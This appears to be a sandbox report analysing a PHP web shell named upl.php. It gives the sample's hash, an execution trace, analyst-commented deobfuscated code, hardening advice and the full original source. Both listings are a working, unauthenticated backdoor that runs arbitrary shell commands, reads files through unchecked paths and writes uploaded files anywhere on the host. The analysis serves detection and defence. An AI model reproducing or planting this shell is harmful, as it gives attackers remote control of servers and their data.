PHP Malware Analysis

upl.php

md5: e27f6ea1fb6afff3e15b102195b6ff8e


Screenshot


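Attributes

Encoding: base64_decode()

Execution: shell_exec()

Files: file_get_contents(), file_put_contents(), scandir(), is_dir(), mkdir(), chmod()

Input: $_POST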


Deobfuscated PHP code

<?php

/**
 * Response helper used by every command branch in this sample: prints $data as JSON.
 *
 * No Content-Type header or HTTP status is set here, and the return value of
 * json_encode() is echoed without a failure check.
 *
 * @param array $data Payload to serialise; each caller in this listing passes "code" => 200.
 */
function echo_json($data = [])
{
    echo json_encode($data);
}
// Analyst summary: unauthenticated command dispatcher (web shell).
// - The only gate is a non-empty POST field "cmd"; no password, token or origin check
//   appears anywhere in this listing, so anyone who can reach the URL can use it.
// - Every branch answers "code" => 200 without checking the result of the call it made,
//   so the response body does not show whether an action succeeded.
// - The literal "/var/www/html" is a deobfuscation artefact: the original sample on this
//   page uses __DIR__. The trace on this page records the script at
//   /var/www/html/uploads/upl.php, so read the literal as "the directory the script
//   was dropped in", not as a path chosen by the author.
// Defender pointers: POST requests carrying a "cmd" field to a PHP file in a writable
// directory, the web-server account spawning a shell, and files or directories newly
// created by that account are the observable side effects of the branches below.
// Usual hardening for this class of script: no PHP execution in writable directories,
// shell_exec in disable_functions, and integrity monitoring of the web root.
if (!empty($_POST['cmd'])) {
    // Liveness check: confirms the script is reachable and returns nothing else.
    if ($_POST['cmd'] == "test") {
        echo_json(["code" => 200]);
    }
    // File read: the POSTed name is appended to the base directory with no validation
    // or normalisation, so this code does not confine the read to that directory.
    if ($_POST['cmd'] == "get_file_data") {
        $data = file_get_contents("/var/www/html/" . $_POST['file']);
        echo_json(["code" => 200, "data" => $data]);
    }
    // Directory listing: top level of the base directory plus one level of each
    // subdirectory. No request input is used in this branch.
    if ($_POST['cmd'] == "get_files") {
        $struct = [];
        $files = scandir("/var/www/html");
        foreach ($files as $file) {
            if ($file == '.' || $file == '..') {
                continue;
            }
            if (is_dir("/var/www/html/" . $file)) {
                // sub_files is the raw scandir() result and is not filtered the way $files is.
                $sub_files = scandir("/var/www/html/" . $file);
                $struct[] = ["file" => $file, "type" => "d", "sub_files" => $sub_files];
            } else {
                $struct[] = ["file" => $file, "type" => "f"];
            }
        }
        echo_json(["code" => 200, "struct" => $struct]);
    }
    // Path disclosure: reports the directory the script runs from.
    if ($_POST['cmd'] == "get_dir") {
        echo_json(["code" => 200, "dir" => "/var/www/html"]);
    }
    // Command execution: the POSTed string goes to shell_exec() unchanged. The return
    // value is discarded, so command output is not part of the HTTP response.
    if ($_POST['cmd'] == "shell_exec") {
        shell_exec($_POST['command']);
        echo_json(["code" => 200]);
    }
    // Directory creation at a caller-supplied path (not prefixed with the base directory),
    // then mode 0755.
    if ($_POST['cmd'] == "mkdir") {
        mkdir($_POST['dir']);
        chmod($_POST['dir'], 0755);
        echo_json(["code" => 200]);
    }
    // File write: base64-decoded POST data is written to a caller-supplied path (again
    // not prefixed with the base directory), then mode 0644. This is the branch that
    // lets further files be placed on the host.
    if ($_POST['cmd'] == "upload") {
        file_put_contents($_POST['file'], base64_decode($_POST['data']));
        chmod($_POST['file'], 0644);
        echo_json(["code" => 200]);
    }
}

Execution traces

data/traces/e27f6ea1fb6afff3e15b102195b6ff8e_trace-1676255973.2398.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:39:59.137657]
1	0	1	0.000182	393512
1	3	0	0.000332	409064	{main}	1		/var/www/html/uploads/upl.php	0	0
1	3	1	0.000355	409064
			0.000386	314864
TRACE END   [2023-02-13 00:39:59.137898]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php 
	
	/**
	 * Response helper used by every command branch in this sample: prints $data as JSON.
	 *
	 * No Content-Type header or HTTP status is set here, and the return value of
	 * json_encode() is echoed without a failure check.
	 *
	 * @param array $data Payload to serialise; each caller in this listing passes "code" => 200.
	 */
	function echo_json($data=[])
	{

		echo json_encode( $data );

	}

	// Analyst summary: unauthenticated command dispatcher (web shell), as submitted.
	// - The only gate is a non-empty POST field "cmd"; there is no password, token or
	//   origin check, so anyone who can reach the URL can use it.
	// - Every branch answers "code" => 200 without checking the result of the call it
	//   made, so the response body does not show whether an action succeeded.
	// - Read and listing branches are relative to __DIR__ (the directory holding this
	//   file); the mkdir and upload branches use the POSTed path as given.
	// Defender pointers: POST requests carrying a "cmd" field to a PHP file in a writable
	// directory, the web-server account spawning a shell, and files or directories newly
	// created by that account are the observable side effects of the branches below.
	if( !empty( $_POST['cmd'] ) ){


		// Liveness check: confirms the script is reachable and returns nothing else.
		if( $_POST['cmd'] == "test" ){

			echo_json([
				"code" => 200,
			]);

		}

		// File read: the POSTed name is appended to __DIR__ with no validation or
		// normalisation, so this code does not confine the read to that directory.
		if( $_POST['cmd'] == "get_file_data" ){

			$data = file_get_contents( __DIR__ . '/' . $_POST['file'] );

			echo_json([
				"code" => 200,
				"data" => $data,
			]);

		}


		// Directory listing: top level of __DIR__ plus one level of each subdirectory.
		// No request input is used in this branch.
		if( $_POST['cmd'] == "get_files" ){

			$struct = [];

			$files = scandir( __DIR__ );

			foreach ($files as $file) {
				
				if( $file == '.' || $file == '..' ){
					continue;
				}

				if( is_dir( __DIR__ . '/' . $file ) ){

					// sub_files is the raw scandir() result and is not filtered the way $files is.
					$sub_files = scandir( __DIR__ . '/' . $file );

					$struct[] = [
						"file" => $file,
						"type" => "d",
						"sub_files" => $sub_files,
					];

				}else{

					$struct[] = [
						"file" => $file,
						"type" => "f",
					];

				}

			}

			echo_json([
				"code" => 200,
				"struct" => $struct,
			]);

		}

		// Path disclosure: reports the directory the script runs from.
		if( $_POST['cmd'] == "get_dir" ){

			echo_json([
				"code" => 200,
				"dir" => __DIR__,
			]);

		}

		// Command execution: the POSTed string goes to shell_exec() unchanged. The return
		// value is discarded, so command output is not part of the HTTP response.
		if( $_POST['cmd'] == "shell_exec" ){

			shell_exec( $_POST['command'] );

			echo_json([
				"code" => 200,
			]);

		}

		// Directory creation at a caller-supplied path (not prefixed with __DIR__),
		// then mode 0755.
		if( $_POST['cmd'] == "mkdir" ){

			mkdir( $_POST['dir'] );
			chmod( $_POST['dir'] , 0755 );

			echo_json([
				"code" => 200,
			]);

		}

		// File write: base64-decoded POST data is written to a caller-supplied path (not
		// prefixed with __DIR__), then mode 0644. This is the branch that lets further
		// files be placed on the host.
		if( $_POST['cmd'] == "upload" ){

			file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) );
			chmod( $_POST['file'] , 0644 );

			echo_json([
				"code" => 200,
			]);

		}

	}